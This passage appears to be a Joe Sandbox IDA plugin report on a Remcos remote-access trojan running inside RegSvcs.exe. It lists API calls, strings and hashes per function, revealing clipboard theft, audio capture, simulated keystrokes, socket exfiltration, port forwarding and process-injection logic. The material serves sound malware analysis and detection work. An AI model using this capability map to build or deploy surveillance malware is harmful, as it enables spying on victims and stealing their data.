                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                              • String ID: 0VG$0VG$<$@$Temp
                              • API String ID: 1704390241-2575729100
                              • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                              • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                              • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                              • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                              APIs
                              • OpenClipboard.USER32 ref: 00416941
                              • EmptyClipboard.USER32 ref: 0041694F
                              • CloseClipboard.USER32 ref: 00416955
                              • OpenClipboard.USER32 ref: 0041695C
                              • GetClipboardData.USER32(0000000D), ref: 0041696C
                              • GlobalLock.KERNEL32(00000000), ref: 00416975
                              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                              • CloseClipboard.USER32 ref: 00416984
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                              • String ID: !D@
                              • API String ID: 2172192267-604454484
                              • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                              • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                              • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                              • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                              APIs
                              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                              • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                              • CloseHandle.KERNEL32(00000000), ref: 0041345F
                              • CloseHandle.KERNEL32(?), ref: 00413465
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                              • String ID:
                              • API String ID: 297527592-0
                              • Opcode ID: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                              • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                              • Opcode Fuzzy Hash: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                              • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                              • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                              • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                              • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                              APIs
                              • _free.LIBCMT ref: 00448135
                                • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                              • _free.LIBCMT ref: 00448141
                              • _free.LIBCMT ref: 0044814C
                              • _free.LIBCMT ref: 00448157
                              • _free.LIBCMT ref: 00448162
                              • _free.LIBCMT ref: 0044816D
                              • _free.LIBCMT ref: 00448178
                              • _free.LIBCMT ref: 00448183
                              • _free.LIBCMT ref: 0044818E
                              • _free.LIBCMT ref: 0044819C
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                              • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                              • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                              • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Eventinet_ntoa
                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                              • API String ID: 3578746661-3604713145
                              • Opcode ID: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
                              • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                              • Opcode Fuzzy Hash: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
                              • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                              APIs
                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DecodePointer
                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                              • API String ID: 3527080286-3064271455
                              • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                              • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                              • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                              • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                              • Sleep.KERNEL32(00000064), ref: 00417521
                              • DeleteFileW.KERNEL32(00000000), ref: 00417555
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CreateDeleteExecuteShellSleep
                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                              • API String ID: 1462127192-2001430897
                              • Opcode ID: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                              • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                              • Opcode Fuzzy Hash: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                              • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                              APIs
                              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 0040749E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CurrentProcess
                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                              • API String ID: 2050909247-4242073005
                              • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                              • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                              • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                              • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                              APIs
                              • _strftime.LIBCMT ref: 00401D50
                                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                              • API String ID: 3809562944-243156785
                              • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                              • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                              • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                              • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                              • int.LIBCPMT ref: 00410E81
                                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                              • std::_Facet_Register.LIBCPMT ref: 00410EC1
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                              • __Init_thread_footer.LIBCMT ref: 00410F29
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                              • String ID: ,kG$0kG
                              • API String ID: 3815856325-2015055088
                              • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                              • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                              • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                              • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                              APIs
                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                              • waveInStart.WINMM ref: 00401CFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                              • String ID: dMG$|MG$PG
                              • API String ID: 1356121797-532278878
                              • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                              • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                              • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                              • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                              • TranslateMessage.USER32(?), ref: 0041D4E9
                              • DispatchMessageA.USER32(?), ref: 0041D4F3
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                              • String ID: Remcos
                              • API String ID: 1970332568-165870891
                              • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                              • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                              • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                              • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                              • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                              • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                              • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                              APIs
                              • GetCPInfo.KERNEL32(?,?), ref: 00453E2F
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453EB2
                              • __alloca_probe_16.LIBCMT ref: 00453EEA
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453F45
                              • __alloca_probe_16.LIBCMT ref: 00453F94
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F5C
                                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FD8
                              • __freea.LIBCMT ref: 00454003
                              • __freea.LIBCMT ref: 0045400F
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                              • String ID:
                              • API String ID: 201697637-0
                              • Opcode ID: 1452827cb3eb1bc769cd2803b66b83105d8708c6945aeeff223bf30089c8c308
                              • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                              • Opcode Fuzzy Hash: 1452827cb3eb1bc769cd2803b66b83105d8708c6945aeeff223bf30089c8c308
                              • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • _memcmp.LIBVCRUNTIME ref: 00445423
                              • _free.LIBCMT ref: 00445494
                              • _free.LIBCMT ref: 004454AD
                              • _free.LIBCMT ref: 004454DF
                              • _free.LIBCMT ref: 004454E8
                              • _free.LIBCMT ref: 004454F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorLast$_abort_memcmp
                              • String ID: C
                              • API String ID: 1679612858-1037565863
                              • Opcode ID: 7211fadd18adb59f2d5684a8a47ee4c6e47293f8742e9a604408f3b76dec3ffb
                              • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                              • Opcode Fuzzy Hash: 7211fadd18adb59f2d5684a8a47ee4c6e47293f8742e9a604408f3b76dec3ffb
                              • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: tcp$udp
                              • API String ID: 0-3725065008
                              • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                              • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                              • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                              • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004018BE
                              • ExitThread.KERNEL32 ref: 004018F6
                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                              • String ID: PkG$XMG$NG$NG
                              • API String ID: 1649129571-3151166067
                              • Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                              • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                              • Opcode Fuzzy Hash: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                              • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                              • String ID: .part
                              • API String ID: 1303771098-3499674018
                              • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                              • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                              • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                              • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                              APIs
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                              • __alloca_probe_16.LIBCMT ref: 0044ACDB
                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                              • __alloca_probe_16.LIBCMT ref: 0044ADC0
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                              • __freea.LIBCMT ref: 0044AE30
                                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                              • __freea.LIBCMT ref: 0044AE39
                              • __freea.LIBCMT ref: 0044AE5E
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                              • String ID:
                              • API String ID: 3864826663-0
                              • Opcode ID: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                              • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                              • Opcode Fuzzy Hash: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                              • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                              APIs
                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: InputSend
                              • String ID:
                              • API String ID: 3431551938-0
                              • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                              • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                              • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                              • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: __freea$__alloca_probe_16_free
                              • String ID: a/p$am/pm$zD
                              • API String ID: 2936374016-2723203690
                              • Opcode ID: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                              • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
